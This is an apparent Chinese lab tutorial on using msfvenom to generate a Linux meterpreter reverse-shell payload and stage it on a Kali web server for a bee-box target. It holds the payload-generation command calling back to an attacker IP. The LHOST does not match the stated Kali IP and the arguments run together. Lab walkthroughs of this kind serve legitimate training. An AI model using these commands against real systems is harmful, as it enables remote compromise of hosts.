目录
二、利用 metasploit 创建并反弹 shell 案例
2、将liang_dolphin.bin 这个payload文件复制放到/var/www/html/下
5、bee-box靶机浏览器访问kali下载payload文件
6、在bee-box靶机终端给liagn_dolphin.bin文件权限,并执行liang_dolphin.bin文件
7、metasploit 侦听器就会收到一个连接请求(可以获取到shell)
介绍:
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报
一、环境准备
实验设备:kali虚拟机和bee-box靶机
kali IP:192.168.17.128 、 bee-box靶机 IP:192.168.17.129
二、利用 metasploit 创建并反弹 shell 案例
1、利用msfvenom生成一个反弹shell程序 ![](https://i-blog.csdnimg.cn/blog_migrate/dddbe463c9dd01b47a3e40be2cbbf3cc.jpeg)
操作命令:生成反弹shell程序
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.11.130LPORT=4443 -f elf > liang_dolphin.bin
2、将liang_dolphin.bin 这个payload文件复制放到/var/www/html/下
操作命令:复制放到/var/www/html/下
cp liang_dolphin.bin /var/www/html/